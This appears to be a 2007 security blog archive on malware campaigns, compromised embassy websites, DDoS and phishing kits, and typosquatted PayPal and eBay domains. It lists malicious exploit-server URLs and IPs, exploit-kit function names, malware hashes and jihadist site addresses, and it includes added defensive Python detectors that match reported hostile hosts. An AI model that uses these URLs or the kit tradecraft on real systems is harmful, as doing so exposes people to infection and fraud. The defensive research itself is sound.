Sunday, September 30, 2007

Don't Play Poker on an Infected Table

The scammy Euro VIP Casino is making another round this afternoon and trying to entice the spammed European users into downloading its software by promising $400 as a welcome bonus. Needless to say you ought to ignore it. Here's a full list of the typosquatted domains serving the scams.

Detection rate: 11/32 (34.38%)
File size: 461341 bytes
MD5: e68763c16f31de340681b2c7c7eb6b0e
SHA1: 6174960cf5a6c503b97c9160f5e6a5babfef96e9

Online gambling is a buzz Internet activity that allows malicious parties to enjoy the "pull effect" of end users who themselves look for and download such applications. In this spamming campaign, however, we have a combination of a "push" approach, segmentation targeting European users, social engineering in the form of a promotion, and typosquatting. The first campaign (SetupCasino.exe) is currently hosted in China (116.199.136.29) on a host managing a second online gambling scam campaign impersonating Golden Gate Casino (SmartDownload.exe) under the following domains: topgamecasino.net; superroyalcasino.com; nlymycasino.cn; lookforcasino.cn

Zero Day Vulnerabilities Market Model Gone Wrong

It's one thing to allow legitimate buyers, presumably the affected vendors themselves, to bid for a zero day vulnerability discovered within their products in order to provide a financial incentive for the researcher who discovered the flaw, another to superficially increase the monetary value of a zero day vulnerability by taking advantage of its vendor-added exclusiveness, but entirely another to position responsible disclosure as an exclusive courtesy. Here's a sample letter informing the company within whose products a vulnerability has been found, and yes, the ultimatum for not releasing it:

"We've discovered an attack against the LinkedIn toolbar. If you are interested in the bug, we would like to give first right of refusal to purchase it. We'd also like to perform a more complete security audit of your products. We can help make the LinkedIn products more secure," DeMott stated in e-mail sent to LinkedIn on July 10, as viewed by CNET News.com. The e-mail continues: "If you wouldn't like to buy it then we are happy to resell or release as a full disclosure to help prevent security issues arising on end users servers. We strongly believe in keeping users safe. We are unique in that we give vendors a first chance at the bugs we discover rather than selling to a third-party or releasing publicly. Please find the VDA Labs Value add document attached. If you'd like to buy the bug we will provide working attack code, so that you can verify the bug, before you send the check." VDA set a deadline of July 17 and requested a payment of $5,000."

I first mentioned the possibility of having a security researcher blackmail an affected party a long time ago; however, I never thought it would be a company with serious knowledge in the field that's setting ultimatums, doubling the requested amount for the vulnerabilities if the vendor delays the response, and threatening to release a PoC in a full disclosure style. Getting paid for getting hacked in reverse order - getting hacked for not paying. However, the ugly reality is that what's a zero day for the mainstream media today is last month's zero day for the underground that's been improving the chances of success of their targeted attacks against a specific company or an individual. That's of course in the rare cases when malware authors no longer keep it simple, the stupids.

Here's another article on this story. Image courtesy of eEye's Zero Day Tracker.

Saturday, September 29, 2007

DIY Chinese Passwords Stealer

This DIY passwords stealer courtesy of a Chinese hacking group is pitched as Vista compatible, with a server size of less than 20kb, process injection, form grabbing and password stealing capabilities for anything keyloggable, anti virus software killing capabilities, and uploading of the results to a central location. In this particular case an example is given for notification via Tencent, China's main IM network. More info:

"Backdoor.Hupigon.GEN has rootkit functionality. It injects itself into Internet Explorer causing IE to hide itself. It also logs keystrokes and sends this information to remote servers."

Detection rate of the builder: 15/32 (46.88%)
File size: 267213 bytes
MD5: a4b9c9f42629865c542ac7b823982843
SHA1: 78f855843d312ab76e1f8f0b912bd475781a8864

Here are several more recent releases by Chinese hacking groups, as well as a comment on the big picture.

A New DDoS Malware Kit in the Wild

On the majority of occasions, malware authors either put effort into implementing a set of standard features within a malware, enabling them to send out spam and use the already infected hosts as future infection and propagation vectors, or entirely outsource the features by releasing the malware as open source. On the other hand, certain malware authors seem to avoid diversification and tend to stick to core competencies only, in this case a DDoS-ready infected host as the malware's only function. This decreases the file size of the malware and somewhat improves its stealthiness by keeping the infected host in a passive "on demand" state, whereas a host that is already sending out spam and phishing emails could be much more easily identified as an infected one, and its DDoS capability could turn irrelevant due to the malware's multitasking activities.

This specific DDoS malware kit currently offered for sale includes the standard firewall bypassing and rootkit capabilities, in between offering the possibility for zero day malware on demand once previous instances of the bot in question achieve a high detection rate. Moreover, in between providing custom DDoS capabilities like the ones I discussed in a previous post, it's yet another indication of the ongoing Web-ization of botnet communications which I think is about to replace the default use of the IRC command and control in the long term.

Friday, September 28, 2007

Syrian Embassy in London Serving Malware

After Bank of India was serving malware in August, next to the U.S. Consulate in St. Petersburg two days later in September, now the Syrian Embassy in London is the latest victim of a popular malware embedding attack which took place between the 21st and 24th of September. As obfuscating the IFRAMEs in order to make it harder for a security researcher to conduct CYBERINT is about to become a commodity, with the feature implemented within the now commoditized malware kits, it's interesting to note that in this particular attack the attackers took advantage of different JavaScript obfuscations, and that once control of the domain was obtained, scam pages were uploaded on the embassy's server. The embassy had recently removed the malicious IFRAMEs, but the third one remains active, acting as a counter for the malicious campaign.

Which domains act as infection vectors?

sicil.info/forum/index.php and sicil.info/g/index.php (203.121.79.71) using patched vulnerabilities exploited in the usual MPack style :

function setslice_exploit
function vml_exploit
function firefox_exploit
function firefox1_exploit
function wmplayer_exploit
function qtime_exploit
function yahoo_e
function winzip_exploit
function flash_exploit
function w2k_ex

0ki.ru/forum/index.php (80.91.191.224) where a WebAttacker launches several other exploits, and x12345.org/img/counter.php?out=1189360677 (66.36.243.97)


What are the malware authors trying to infect the visitors with?

A Banker Trojan with a low detection rate :

BitDefender 2007.09.28 BehavesLike:Win32.ProcessHijack
Ikarus 2007.09.28 Trojan.Delf.NEB
Microsoft 2007.09.28 PWS:Win32/Ldpinch.gen
Symantec 2007.09.28 Infostealer.Banker.C

98shd3.exe
File size: 65024 bytes
MD5: ef98a662c72e3227d5c4bb3465133040
SHA1: e5b9b216d77de977848f8791850c726b45fc18c2

Think malware authors were virtually satisfied to only have the visitors infected with the malware? Not at all. This is perhaps the first but definitely not the last time I see an embassy hosting pharmaceutical scam pages and ring tone ones. List of historically hosted scam pages :

syrianembassy.co.uk/news/lv/levitra-vs-viagra.htm
syrianembassy.co.uk/news/lv/buy-levitra.htm
syrianembassy.co.uk/news/rn/michael-jackson-ringtone.htm
syrianembassy.co.uk/news/xa/cheap-discount.htm-group.com-herbal-xanax-xnx.htm
syrianembassy.co.uk/news/rn/free-mp3-ringtone-maker.htm
syrianembassy.co.uk/news/xa/buy-site-xanax.htm
syrianembassy.co.uk/news/ph/37-5mg-phentermine.htm

UPDATE :
The folks at ScanSafe contacted me to point out that they've discovered the malware at the Syrian embassy on the 12th of August providing us with more insights on how long the attackers had access to the embassy's site. In ScanSafe's example, different malicious URLs (miron555.org/s/index.php) were rotated compared to the ones used during 21/24 of September. And given the embassy's site states it was last updated in 2005, cleaning it up and ensuring the attackers no longer have access to it may take a while.
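A site owner can audit their own pages for this kind of embedding. The sketch below is an added example, not code from the post or from any kit it mentions: it lists off-site IFRAMEs in a page, marks hidden ones, matches hosts against the ones named in this post, and decodes unescape("...") arguments so that IFRAMEs written by script are audited too. The sample page, stats.example.net and the /news/latest.htm path are constructed.

```python
import re
from html.parser import HTMLParser
from urllib.parse import unquote, urljoin, urlparse

# Hosts named in this post as exploit servers or campaign counters.
REPORTED_HOSTS = {"sicil.info", "0ki.ru", "x12345.org", "miron555.org"}
UNESCAPE_ARG = re.compile(r"unescape\(\s*(['\"])(.*?)\1\s*\)", re.S)
TINY = {"0", "1", "0px", "1px"}


class Collector(HTMLParser):
    """Gather <iframe> attributes and the text of inline <script> blocks."""

    def __init__(self):
        super().__init__()
        self.frames, self.scripts, self.in_script = [], [], False

    def handle_starttag(self, tag, attrs):
        if tag == "iframe":
            self.frames.append({k: (v or "") for k, v in attrs})
        elif tag == "script":
            self.in_script = True

    def handle_endtag(self, tag):
        if tag == "script":
            self.in_script = False

    def handle_data(self, data):
        if self.in_script:
            self.scripts.append(data)


def same_or_sub(host, base):
    return host == base or host.endswith("." + base)


def is_hidden(attrs):
    """Zero or one pixel frames, or frames hidden through inline CSS."""
    style = attrs.get("style", "").replace(" ", "").lower()
    return (attrs.get("width", "").strip().lower() in TINY
            or attrs.get("height", "").strip().lower() in TINY
            or "display:none" in style or "visibility:hidden" in style)


def audit_page(html, site_host, via="markup"):
    """Return sorted (host, verdict, via) tuples for off-site iframes."""
    collector = Collector()
    collector.feed(html)
    collector.close()
    findings = set()
    for attrs in collector.frames:
        # Resolve relative src values against the audited site first.
        url = urljoin("http://%s/" % site_host, attrs.get("src", ""))
        host = (urlparse(url).hostname or "").lower()
        if not host or same_or_sub(host, site_host):
            continue
        if any(same_or_sub(host, h) for h in REPORTED_HOSTS):
            verdict = "reported-host"
        elif is_hidden(attrs):
            verdict = "hidden-external"
        else:
            verdict = "external"
        findings.add((host, verdict, via))
    # Frames written at run time never show up in the markup: decode each
    # unescape("...") argument and audit the result as markup of its own.
    for script in collector.scripts:
        for match in UNESCAPE_ARG.finditer(script):
            findings.update(audit_page(unquote(match.group(2)), site_host, "script"))
    return sorted(findings)


# Constructed sample page; only the sicil.info and 0ki.ru URLs come from the post.
SAMPLE = """<html><body>
<iframe src="/news/latest.htm" width="600" height="400"></iframe>
<iframe src="http://sicil.info/g/index.php" width="0" height="0"></iframe>
<iframe src="http://stats.example.net/c.php" style="display: none"></iframe>
<script>document.write(unescape("%3Ciframe%20src%3D%22http%3A//0ki.ru/forum/index.php%22%20width%3D1%20height%3D1%3E%3C/iframe%3E"));</script>
</body></html>"""

if __name__ == "__main__":
    for finding in audit_page(SAMPLE, "syrianembassy.co.uk"):
        print(finding)
```

Only the plain unescape() form is decoded here; other script obfuscations need the page to be rendered in an instrumented browser.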

Thursday, September 27, 2007

Wednesday, September 26, 2007

A New Issue of (IN)Secure Magazine "in the Wild"

(IN)Secure Magazine's Issue 13 was released yesterday, and as always is definitely worth printing out. What is (IN)Secure Magazine? (IN)Secure Magazine is the type of "too good to be for free" kind of publication, covering the information security industry, the newly emerging technologies and threats, as well as the people who put it all together.

It's also great to note that my blog has been featured in their new section at page 62, an indication for an upcoming flood of an even more quality audience, and a personal incentive to contribute to a future issue of the magazine with a qualitative research on zero day vulnerability markets I've been working on for a while.

China's Cyber Espionage Ambitions

Must have been a slow news week, so slow that all of a sudden Germany, the U.K, France, New Zealand, and the U.S got hacked by China's cyber spies. "Poor China" not just denied it, but also admitted to getting hacked by supposedly one of the countries that started the allegations. Pretty much all the news articles enjoying the media-echo effect exclude the reality as an issue, namely that each of the countries blaming China for cyber espionage has been developing its own offensive cyber warfare capabilities for years. Some of the good examples to illustrate the diverse topic are, for instance, North Korea's Cyber Warfare Unit 121, which was originally started in order for North Korea to balance its lack of conventional weaponry capabilities by improving its asymmetric warfare ones, passive cyber espionage in the form of gathering OSINT Through Botnets, releasing DIY attack tools in times of hacktivism tensions, or the healthy paranoia posed by the fear that now Chinese-owned Lenovo could be implementing hardware backdoors, in between China's recent interest in buying Seagate Technology fueling the tensions even further.

In a nation2nation cyber warfare scenario, the country that's relying on and empowering its citizens with cyber warfare or CYBERINT capabilities will win over the country that's dedicating special units for both defensive and offensive activities, something that China, which has been copying its attitude from U.S. military thinkers, is already envisioning:

"It also put forward the concept of a "people's information war" for the first time, describing this as a form of national non-symmetric warfare, with the people at the core, computers as the weapons, knowledge as the ammunition and the enemy's information network as the battlefield. These experts believe that ordinary people can be mobilized to provide global information support, spread global propaganda and conduct global psychological warfare. Such attacks could be launched from anywhere in the world at the enemy's military, political and economic information systems. If necessary, the experts suggested, computers currently under the control of Chinese enterprises could be dispersed among the people and connected to volunteer Web portals around the world, which would become a combined strategic cyber attack force. The article concluded by emphasizing that training "hacker warriors" should be a priority within the Chinese military."

All warfare is indeed based on deception. Go through a related post on The Biggest Military Hacks of All Time as well, and if objectivity is important to you, ask yourself the following, or question the lack of its answer within an article stating a country did something:

Was it the NSANet, the Joint Worldwide Intelligence Communications System [JWICS], the Secret Internet Protocol Router Network (SIPRNET), or the Unclassified but Sensitive Internet Protocol Router Network (NIPRNet) actually breached?

Cover courtesy of Der Spiegel.

Localizing Open Source Malware

Can you find the differences in this piece of malware compared to the previous open source one I covered recently? Besides its localization to Chinese there aren't any, and this development clearly demonstrates the dynamics of the malware scene. A common Web 2.0 mentality is that the more people use the service, the better it gets, a mode of thinking we could see applied in the case of open source malware, and malware as a web service. Once the source code becomes publicly obtainable, it's not just new features and modules that get introduced, but also, the malware starts using the Web as a platform. In fact, some of the most popular open source malware codes are successfully building communities around their open source nature, thus, attracting "malicious innovation" on behalf of third-party coders. Should we therefore make a distinction between a malware author, and a malware module coder?

Monday, September 24, 2007

The Dark Web and Cyber Jihad

It's interesting to monitor the use and abuse of the buzz word "Dark Web". This press release, for instance, tries to imply that the crawlers are actually crawling the Dark Web and analyzing cyber jihadist activities, a bit of an awkward statement given what the Dark Web is at the bottom line - a web that is closed to web crawlers either through standard measures, or authentication:

"This is where the Dark Web project comes in. Using advanced techniques such as Web spidering, link analysis, content analysis, authorship analysis, sentiment analysis and multimedia analysis, Chen and his team can find, catalogue and analyze extremist activities online. According to Chen, scenarios involving vast amounts of information and data points are ideal challenges for computational scientists, who use the power of advanced computers and applications to find patterns and connections where humans can not. One of the tools developed by Dark Web is a technique called Writeprint, which automatically extracts thousands of multilingual, structural, and semantic features to determine who is creating 'anonymous' content online. Writeprint can look at a posting on an online bulletin board, for example, and compare it with writings found elsewhere on the Internet. By analyzing these certain features, it can determine with more than 95 percent accuracy if the author has produced other content in the past. The system can then alert analysts when the same author produces new content, as well as where on the Internet the content is being copied, linked to or discussed."

I've blogged about this AI project over a year ago, and have been following it ever since while experimenting with link and multimedia analysis of cyber jihadist communities before they were shut down. And while the innovations they've introduced for this period are impressive in terms of drawing social networking maps, the Dark Web's very principle, namely that it's an authentication-only Web, meaning it's closed to spiders and even human researchers through basic invite-only or password authentication methods, will prompt researchers to adapt in the long term. Many of the cyber jihadist forums I didn't include in my last external links extraction were great examples of the dark cyber jihadist web: knowing where you crawl doesn't mean there'll be anything publicly available to crawl, and the trend is just starting to emerge. Such VIP clubs represent closed communities where more effort should be put into taking a peek, thus it's ruining previous efficiency-centered approaches of analyzing cyber jihadist communities. The alternatives remain rather contradictory but fully realistic - infecting terrorist suspects with malware, embedding malware within cyber jihadist communities, or unethically pen-testing the cyber jihadist communities to have the AI analyze the data obtained from the closed community, thus the Dark Web, at a later stage.

Meanwhile, after having the Global Islamic Media Front's online presence limited to the minimum, GIMF is making it in the mainstream media :

"On sites easily traceable via search engines, the German-language arm of the "Global Islamic Media Front" (GIMF) appeals for volunteer translators, inviting them to reply to a Hotmail address, and posts links to dozens of al Qaeda videos. "After some brothers and sisters were arrested (may Allah free them) and the Forum and blog of the GIMF were removed, we say this: the GIMF still exists and will continue its work," a statement from the front says. "To the Kuffar (infidels) who try to fight us, we say: you can do what you like, make as many arrests as you like...you will not reach your goal. We will always keep going until we achieve victory or martyrdom." The re-emergence of the GIMF in German highlights the difficulty for authorities of shutting down radical Islamist Web sites, which often simply spring up at new addresses."

Easily traceable mainly because they're not behind the Dark Web, at least not for now. Currently active GIMF URLs :

gimf.12gbfree.com
gimf.22web.net
gimf.cjb.net
gimfupload.blogspot.com with two redirectors gimfupload.notlong.com ; gimfupload.2ya.com

Although there are still literally hundreds of cyber jihadist forums and sites, quantity is not always equal to quality, namely, only a few of these will achieve success and mature into potentially dangerous communities. In the long term, however, once the "tip of the iceberg" communities disappear, efficiency from the cyber jihadists will get sacrificed for improved OPSEC, namely they'll start operating behind the true Dark Web, making them more difficult and time-consuming to assess, track down, and shut down.

UPDATE: Inshallahshaheed (GIMF) has a new home.

Friday, September 21, 2007

The Truth Serum - Have a Drink!

Which security vendor would you rather choose if you were to ignore your current Return on Security Investment model? The one telling you "everything's under control", that "malicious attackers are losing creativity and cannot bypass our security solutions", or the one whose attitude is "our solutions fully demonstrate marginal thinking in respect to fighting cyber threats, namely, they mitigate certain risks and limit the probability for a security incident, but do not and cannot provide 100% security"?

Basic human psychology and purchasing habits would stick to the first one, the one pretending to offer 100% security -- something even a condom cannot offer yet everyone's thankfully using them. Even worse is falling victim to the myopia that the market leader, or the company with the highest brand equity, is actually the one worth doing business with. As it appears, McAfee CEO David DeWalt had a drink from the truth serum before InformationWeek's 500 Conference in order to comment that "We're in inning two of a nine-inning game here" in respect to how cyber threats often outpace security measures. Moreover, a year ago I commented on a Gartner analyst's statement that security is all about percentage of budget allocation, and therefore the more you spend the more secure you get, among the most common myopias nowadays. Now, Gartner vice-president John Pescatore is wisely insisting that companies spend less on IT security, and given how when Gartner sneezes the whole industry gets a cold, it's a step in the right direction - debunking common security myopias.

In a world dominated by perimeter defense solutions, being a visionary realist is an objective luxury.

Thursday, September 20, 2007

DIY Phishing Kit Goes 2.0

With the release of the second version of the DIY phishing kit that I covered in a previous post, next to commentary on another one and a DIY pharming tool, the timeframe for creating a phishing page just got shorter than it used to be before. Moreover, the phishing ecosystem is getting closer to fully achieving its malicious economies of scale, ones where the number of phishing campaigns in the wild outpaces the possibilities for timely shutting them down. Even worse, phishers do not seem to be interested in re-inventing the wheel, and having to create a new phishing page for any site or service, instead, such phishing pages are now a commodity, and with the ecosystem itself clearly cooperating with malware authors, you end up in a situation where a malware infected host is not just hosting malware for the next victim to get infected, running multiple DNS servers, sending out spam and phishing emails, but also, hosting the phishing pages themselves.

Amateur phishers do not put effort into ensuring the quality and the lifetime of their phishing campaigns, and you can clearly recognize such an amateur campaign by visiting the phishing URL you've just received and finding that it's already down. The more sophisticated phishers, however, are not just efficiency-obsessed, but also take advantage of typosquatting and basic segmentation approaches, for instance, acquiring a Russian email database to use as the foundation for a WebMoney phishing campaign, and a U.S one for a PayPal one. Moreover, sophisticated phishers also put more effort and invest more time into personalizing the emails and, in rare cases, the phishing pages themselves, in between localizing the campaign by having it translated into the local language of the country to which the email database belongs, thus improving the chances of the campaign. This is yet another disturbing trend worth commenting on - malware is maturing into a services-centered economy, and so is the case with spamming and phishing, a logical development with the commoditization of what used to be very exclusive tools.

What are the major improvements in the new version? In the first one, the phisher had to manually paste the source code of the real page, have the kit automatically redirect the data to a third party URL, and also manually fix the image locations to ensure that they would load properly. In the second version, there are POST and GET commands available so that the source code gets acquired automatically, and an internal Image Grabber so that the exact URLs of all the images within the login page can get easily integrated within the phishing page about to get generated. Getting back to differentiating the amateur from the sophisticated phishers, the latter have more resources at their disposal and better confidence in their hosting provider, so that instead of loading the images from the original site, they're hosting them locally. This kit will inevitably continue to evolve; I wish it did so in proportion to the end user's understanding of how to protect against "push" phishing attacks though.
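The amateur case described above, a phishing page that loads its images from the original site, is visible in the original site's own access logs. This added example (not part of the original post or of any kit) reads combined-format log lines and reports foreign Referer hosts that pull login-page images; the host bank.example, the /img/login/ prefix and every log line are constructed assumptions.

```python
import re
from collections import defaultdict
from urllib.parse import urlparse

# Apache/nginx "combined" log format.
LOG_LINE = re.compile(
    r'(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) \S+ '
    r'"(?P<referer>[^"]*)" "(?P<agent>[^"]*)"')

OWN_HOSTS = ("bank.example",)    # hypothetical: the legitimate site's own hosts
LOGIN_ASSETS = ("/img/login/",)  # hypothetical: where the login page images live


def hotlinking_referers(lines, min_clients=2):
    """Return (referer_host, distinct_clients, referring_pages, first_seen)
    for foreign pages whose visitors fetched our login-page images."""
    seen = defaultdict(lambda: {"clients": set(), "pages": set(), "first": None})
    for line in lines:
        m = LOG_LINE.match(line)
        if not m or m["method"] != "GET":
            continue
        if not m["path"].startswith(LOGIN_ASSETS):
            continue
        ref = urlparse(m["referer"])
        host = (ref.hostname or "").lower()
        # An empty or "-" Referer has no host; our own pages are expected.
        if not host or any(host == h or host.endswith("." + h) for h in OWN_HOSTS):
            continue
        entry = seen[host]
        entry["clients"].add(m["ip"])
        entry["pages"].add(ref.path)
        entry["first"] = entry["first"] or m["ts"]  # log is chronological
    rows = [(h, len(e["clients"]), sorted(e["pages"]), e["first"])
            for h, e in seen.items() if len(e["clients"]) >= min_clients]
    # Most widely seen referer first; ties broken by host name.
    return sorted(rows, key=lambda r: (-r[1], r[0]))


# Constructed sample log: documentation IP ranges and example domains only.
SAMPLE_LOG = [
    '192.0.2.10 - - [20/Sep/2007:09:58:01 +0000] "GET /img/login/logo.gif HTTP/1.1" 200 2326 "http://www.bank.example/login" "Mozilla/4.0"',
    '198.51.100.7 - - [20/Sep/2007:10:01:12 +0000] "GET /img/login/logo.gif HTTP/1.1" 200 2326 "http://bank-example-login.example.net/secure/index.htm" "Mozilla/4.0"',
    '198.51.100.7 - - [20/Sep/2007:10:01:12 +0000] "GET /img/login/button.gif HTTP/1.1" 200 811 "http://bank-example-login.example.net/secure/index.htm" "Mozilla/4.0"',
    '203.0.113.44 - - [20/Sep/2007:10:03:40 +0000] "GET /img/login/logo.gif HTTP/1.1" 200 2326 "http://bank-example-login.example.net/secure/index.htm" "Mozilla/5.0"',
    '192.0.2.55 - - [20/Sep/2007:10:04:02 +0000] "GET /img/login/logo.gif HTTP/1.1" 200 2326 "http://cache.search.example/q?u=bank" "Mozilla/5.0"',
    '192.0.2.77 - - [20/Sep/2007:10:05:30 +0000] "GET /img/login/logo.gif HTTP/1.1" 200 2326 "-" "Mozilla/4.0"',
    '203.0.113.90 - - [20/Sep/2007:10:07:05 +0000] "GET /img/login/logo.gif HTTP/1.1" 200 2326 "http://bank-example-login.example.net/secure/index.htm" "Mozilla/4.0"',
    '198.51.100.7 - - [20/Sep/2007:10:08:19 +0000] "GET /index.html HTTP/1.1" 200 5120 "http://bank-example-login.example.net/secure/index.htm" "Mozilla/4.0"',
]

if __name__ == "__main__":
    for row in hotlinking_referers(SAMPLE_LOG):
        print(row)
```

Pages that host their images locally, the sophisticated case in the post, leave no such trace in these logs.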

Related posts:
Taking Down Phishing Sites - A Business Model?

Wednesday, September 19, 2007

Custom DDoS Capabilities Within a Malware

DDoS capabilities within a malware are nothing new and are in fact becoming a commodity feature, but compared to the average DDoS-ers with up to two different DoS attack approaches, or the types of malware with hardcoded IPs to be attacked, there's a disturbing trend to diversify the DoS techniques used as much as possible to improve the chances of a successful attack, let's not mention the allocation of automatic self-defensive DDoS back at curious parties due to the oversupply of infected hosts. As you can see in this particular malware -- high detection rate -- the DDoS variables within are not only diverse enough to cause a lot of damage, but also, simultaneous combinations are also possible.

Now comes the digitally ugly part. Open source malware results in many different variants with a huge variety of new modules and options implemented within, even worse, the software client can indeed mature into a web based malware C&C like the ones we've been seeing since the beginning of 2007. And this is exactly what happened with this open source malware - a Chinese hacking team is currently offering a Web builder for sale, making it possible to integrate the malware on the Web in a typical do-it-yourself fashion. What types of attacks are included anyway :

- ICMP/SYN/TCP and UDP flooding
- HTTP no-cache, GET flooding
- CC variety
- GAME, CIDR, Hybrid flooding capabilities

The Black Sun bot, the Cyber bot, MPack, IcePack, WebAttacker, the Nuclear Malware Kit and Zunker are all Web based malware platforms and were originally released as such, compared to the Web adaptation of this one.

Two Cyber Jihadist Blogs Now Offline

Jihad Fields are Calling and The Ignored Puzzle of Knowledge are down, apparently the authors themselves decided to delete them compared to Wordpress shutting down the Global Islamic Media Front like it happened before. Ensuring that these "tip of the iceberg" cyber jihadist communities stay offline has a long-term PSYOPS effect on future wannabe cyber jihadists wanting to operate such communities, ones where talkers eventually turn into doers.

Monday, September 17, 2007

A Chinese Malware Downloader in the Wild

This is an example of a DIY downloader recently released in the wild, with rather average features such as the ability for the malware author to choose multiple locations of the files to be "dropped", as well as the time interval to check for the newly distributed binaries. The high detection rate of the downloader itself -- Result: 23/32 (71.88%) -- is not the main point I'd like to emphasize, but rather that compared to the majority of downloaders courtesy of Russian malware authors I occasionally come across, this is a Chinese one. China is often blamed for being the country hosting the highest percentage of malware in the world; however, China is also the country with the highest percentage of infected PCs, and as we've seen with Storm Worm an infected host starts acting as both infection and propagation vector for the malware in question. As in any other local malware market, DIY tools get released so that script kiddies can generate enough noise to keep the more sophisticated malware campaigns running behind the curtains.

PayPal and Ebay Phishing Domains

As I needed another benchmark for a creative typosquatting next to my best finding of this World of Warcraft domain scam, I stumbled upon the following list of domains, where the most creative domain squatting is done solely for the purpose of including the domains within a typical phishing scam URL structure. Some of the domains are actual Rock Phish ones that are currently hosting live phishing campaigns :

paypal-online-account.com
paypal-user-update.com
paypal-support1.com
paypal-account-protection.com
paypal1-login.com
paypal-accounts-update.com

Some "creative" ones to be abused :

paypal-aspx.com
paypal-cgi3.info
paypal-cmd.com
paypal-comlwebscrc-login-run.com
paypal-confirmation-id-0746795.com

And since PayPal is actually eBay after the acquisition, here are some "creative" eBay domain scams as well:

ebay-com-isapidll.com
ebayisapidll-cgi.com
ebayisapidllaw2.com
ebayisapidllu.com

Authentication itself seems to be a priority as the customer must possess tangible proof that her transactions' security is somehow enhanced by layered authentication, no doubt about it. But with phishers actively using a "push" model that is starting to visually social engineer the customers by registering domains imitating PayPal and eBay's web application structure, authentication itself shouldn't be priority number one the way it is for the time being, as phishers are not even trying to bypass it.
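The domains listed above follow a pattern that can be checked mechanically when triaging newly registered names. This added example (not the author's tooling) flags domains that embed a brand and then separates names imitating web application URL tokens from names using account-service wording; both token lists are assumptions derived from the domains in this post, and the two verdict groups are this example's own and do not mirror the post's lists.

```python
from collections import defaultdict

# Brand token -> the brand's real registrable domain.
BRANDS = {"paypal": "paypal.com", "ebay": "ebay.com"}

# Tokens that imitate pieces of a web application URL (assumed list, taken
# from the domains in this post: aspx, cgi, cmd, webscr, isapidll).
URL_STRUCTURE = ("aspx", "cgi", "cmd", "webscr", "isapidll")

# Account-service wording seen in the listed domains (assumed list).
SERVICE_WORDS = ("account", "confirmation", "login", "online",
                 "protection", "support", "update", "user")


def classify(domain):
    """Return (verdict, brand, matched_tokens) for one domain name.

    Substring matching is a deliberate heuristic: names such as
    'comlwebscrc' or 'isapidllaw2' glue the tokens to other characters.
    It will also hit unrelated names containing 'ebay', so treat the
    verdict as a triage hint and not as proof.
    """
    host = domain.strip().lower().rstrip(".")
    for brand, official in BRANDS.items():
        if host == official or host.endswith("." + official):
            return ("official", brand, ())
    name = host.rpartition(".")[0]  # assumes a single-label TLD
    for brand in BRANDS:
        if brand not in name:
            continue
        rest = name.replace(brand, "", 1)
        structure = tuple(t for t in URL_STRUCTURE if t in rest)
        if structure:
            return ("brand+url-structure", brand, structure)
        words = tuple(w for w in SERVICE_WORDS if w in rest)
        if words:
            return ("brand+service-wording", brand, words)
        return ("brand-embedded", brand, ())
    return ("unrelated", None, ())


def triage(domains):
    """Group domains by verdict."""
    groups = defaultdict(list)
    for d in domains:
        groups[classify(d)[0]].append(d)
    return dict(groups)


# The fifteen domains listed in this post.
PAGE_DOMAINS = [
    "paypal-online-account.com", "paypal-user-update.com",
    "paypal-support1.com", "paypal-account-protection.com",
    "paypal1-login.com", "paypal-accounts-update.com",
    "paypal-aspx.com", "paypal-cgi3.info", "paypal-cmd.com",
    "paypal-comlwebscrc-login-run.com",
    "paypal-confirmation-id-0746795.com",
    "ebay-com-isapidll.com", "ebayisapidll-cgi.com",
    "ebayisapidllaw2.com", "ebayisapidllu.com",
]

if __name__ == "__main__":
    for verdict, names in triage(PAGE_DOMAINS + ["www.paypal.com"]).items():
        print(verdict, len(names))
        for n in names:
            print("   ", n, classify(n)[2])
```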

Stats courtesy of the Anti-Phishing Working Group.

Storm Worm's DDoS Attitude - Part Two

After commenting on Storm Worm's logical connection with the recent DDoS attacks against anti-scam web sites, SecureWorks timely released details of what actions could trigger a DDoS attack from Storm back at the researcher's host and what type of DDoS attacks are launched exactly :

"The attacks do show signs of being automated. Certain actions reliably trigger attacks. Investigators who can withstand the onslaught and have decided to test their theories (with cooperation from their ISPs, of course) can reliably trigger DDoS attacks on themselves. In one case, probing more than four unique Peacomm botnet HTTP proxies within ten seconds results in a flood of TCP SYN and ICMP packets, which last for about two hours. That’s all fairly regular."

To me, this tactic is more of a "hey our situational awareness on your actions to shut us down is fairly good enough" type of statement, but why would the botnet masters risk exposing infected hosts compared to the opportunity to have them act like nothing's in fact wrong with them? Mainly because if infected hosts were a scarce resource perhaps they would, but in Storm Worm's case the oversupply of infected hosts is allowing them to dedicate resources for automatic self-defensive DDoS.

Friday, September 14, 2007

U.S Consulate St. Petersburg Serving Malware

If that's not a pattern and good timing, it's a malicious anomaly. On the 31st of August, 2007, Bank of India was serving malware courtesy of the Russian Business Network. This week, evidence that the U.S Consulate in St. Petersburg, Russia was serving malware to its visitors proved to be true. The web site is now clean, but assessing the IFRAME-ed URLs used in the attack is possible as they're still reachable. It's still unknown how long the IFRAMEs remained embedded at the Consulate's web site, as well as when they were cleaned, but the attack was still active on the 2nd of September, 2007, just two days after Bank of India's malware attack. It's also worth mentioning that compared to the most recent malware embedded attacks which had the IFRAMEs directly embedded within, in this one the IFRAME itself is obfuscated but the live exploit URL isn't.

Tipped by a third-party, Sophos managed to locate the exact URL by deobfuscating the rather simple URL obfuscation, and Fraser Howard posted some interesting details at their blog :

"The purpose of the attacks is to infect victims with Trojans from the two attack sites. As discussed in a recent paper, the increased use of automation to continually re-encrypt/pack/obfuscate the Trojans highlights the need for good generic detection technology. A system to continuously monitor these files in order to maintain detection is essential. So, to answer the question of whether the U.S. Consulate General site was specifically targeted in this attack - my answer is no, probably not. The prevalence of other much smaller sites compromised in exactly the same way (in just seven days worth of data) suggests that the hackers just happened to have caught a big fish as they trawled for vulnerable servers. It just goes to show that security is important on all machines hosting both small and large websites."

We could greatly expand those as a matter of fact. The IFRAME used leads us to verymonkey.com/goof/index.php (209.123.181.185) and verymonkey.com/test/index.php which is exploiting a modified MDAC, and aims to execute the following binary Virus.Win32.Zapchast.DA :

Detection rate : Result: 6/32 (18.75%)
AntiVir 2007.09.14 DR/Delphi.Gen
AVG 2007.09.14 Obfustat.NPJ
eSafe 2007.09.13 Suspicious Trojan/Worm
Ikarus 2007.09.14 Virus.Win32.Zapchast.DA
VirusBuster 2007.09.13 Trojan.Agent.JVF
Webwasher-Gateway 2007.09.14 Trojan.Delphi.Gen

File size: 28672 bytes
MD5: a25ad0045d195016690b299bfb8b75d1
SHA1: ab219c50b0adc84f702c696797e81411b6eab596

